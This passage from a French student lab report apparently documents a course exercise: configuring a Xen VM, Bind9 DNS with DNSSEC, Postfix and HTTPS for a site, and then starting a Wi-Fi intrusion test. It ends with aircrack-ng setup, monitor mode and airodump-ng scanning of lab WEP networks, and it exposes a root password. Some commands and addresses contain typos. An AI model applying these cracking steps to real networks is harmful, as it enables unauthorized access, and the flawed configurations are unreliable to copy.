Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on ajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une passerelle doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interface avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comme ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
Grace aux efforts de monsieur Xavier Redon pour permettre de joindre Capbreton a distance pendant le confinement avec la commande 'SSH'.&lt;br /&gt;
&lt;br /&gt;
On peux donc maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. &lt;br /&gt;
&lt;br /&gt;
Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
&lt;br /&gt;
Glue records fournis par Gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié notre DNS a une ip, il faut renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. &lt;br /&gt;
&lt;br /&gt;
Si ce n'est pas le cas Gandi ne pourras pas liée les DNS a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveurs DNS configurer on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon notre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commencer, on crée un répertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. &lt;br /&gt;
&lt;br /&gt;
Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les renommer pour plus de transparence.&lt;br /&gt;
&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK).&lt;br /&gt;
&lt;br /&gt;
Puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a Gandi comme montrer ci-dessous en n'oubliant pas de sélectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le DNS et représente la chaine d'authentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une messagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérification de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenêtre de configuration s'ouvre. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la réception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les message reçu en tapant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on reçoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que Gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoin de pouvoir recevoir les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commande &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différant care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyé le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de Gandi on reçoit un code de confirmation ainsi qu'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|Fichiers Gandi a téléchargé]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
Le service ne fonctionne pas encore car on a rien qui écoute le port 442. &lt;br /&gt;
 /etc/apache2/sites-available/default-ssl.conf &lt;br /&gt;
 dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
Il ne faut pas oublier d'incrémenter le numéro de version avant de restart le service 'bind9'&lt;br /&gt;
&lt;br /&gt;
On vérifie que tout fonctionne bien avec les commandes : &lt;br /&gt;
 host www.glopglop.site&lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
  &lt;br /&gt;
 host www.glopglop.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 &lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
On peut maintenant vérifier que le site est maintenant bien sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Glopglop.site_Securisé.png|1000px|thumb|left|GlopGlop.site en Https]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on a maintenant un site sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
====Modification de la page d'accueille Apashe2====&lt;br /&gt;
&lt;br /&gt;
Pour éviter d'avoir la page de base Apash2, on va modifier le fichier 'index.html' pour cela il suffit d'éditer le fichier avec vim avec la commande &amp;lt;code&amp;gt;vim /var/www/html/index.html&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Le site : https://www.w3schools.com/html/html_examples.asp explique comment faire sa propre page web.&lt;br /&gt;
la page pour le site 'glopglop.site' ne sert que d'exemple si on veux une page plus élaborer des template sont directement disponible sur le net avec en prime les fichiers css pour obtenir un site vraiment attractif. mais on cherche juste pour le moment a avoir une page différente de test.&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
